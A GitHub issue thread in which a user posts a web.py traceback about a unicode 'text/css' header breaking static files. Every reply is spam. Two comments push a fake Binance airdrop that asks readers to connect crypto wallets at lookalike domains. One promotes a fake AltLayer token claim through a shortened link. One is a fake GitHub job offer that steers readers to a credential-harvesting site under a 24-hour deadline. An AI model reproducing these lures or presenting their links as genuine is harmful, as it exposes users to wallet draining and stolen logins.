### ISSUE TITLE
webpy 跑不起来静态文件，为何?

### ISSUE THREAD

**Issue by fishenal** [the5fire/backbonejs-learning-note#18]
Traceback (most recent call last):
  File "D:\python 2.7.7\lib\site-packages\web\wsgiserver__init__.py", line 1245, in communicate
    req.respond()
  File "D:\python 2.7.7\lib\site-packages\web\wsgiserver__init__.py", line 775, in respond
    self.server.gateway(self).respond()
  File "D:\python 2.7.7\lib\site-packages\web\wsgiserver__init__.py", line 2020, in respond
    for chunk in response:
  File "D:\python 2.7.7\lib\site-packages\web\httpserver.py", line 247, in **iter**
    self.start_response(self.status, self.headers)
  File "D:\python 2.7.7\lib\site-packages\web\httpserver.py", line 302, in xstart_response
    out = start_response(status, response_headers, *args)
  File "D:\python 2.7.7\lib\site-packages\web\wsgiserver__init__.py", line 2058, in start_response
    raise TypeError("WSGI response header value %r is not a byte string." % v)
TypeError: WSGI response header value u'text/css' is not a byte string.

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by shafwansyah** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by HieuMed2Lab** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](http://bit.ly/3SqCGvw)

🚀 **Exciting Announcement!** 

AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 400,000,000 (4% of the total supply)

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](http://bit.ly/3SqCGvw).

The window to [Claim $ALT tokens](http://bit.ly/3SqCGvw) is open from January 25 to February 08, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

Oned-code, @reloot-v-reboot, @poptart69, @AndreaBarbon, @ugmichael, @glaksmono, @Xeway, @0xAwy, @shaobaili3, @colliepixels, @brossetti1, @decendao, @masaki345, @ogmoonboi, @theoskille, @dg3feiko, @patrulek, @IngeniousArtist, @marissaposner, @b1u3h4t

**Comment by smcgive** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
massmr, @imranpollob, @nvmmonkey, @tangseng110, @sardChen, @Nate111, @hattiepwvi, @jwrookie, @longle459, @degencodebeast, @ahmedali8, @roigeturing, @aichizhajiang, @aluminum-mistress, @amusingaxl, @praniis, @aminfelah, @nikita, @berndartmueller, @icpmacdo
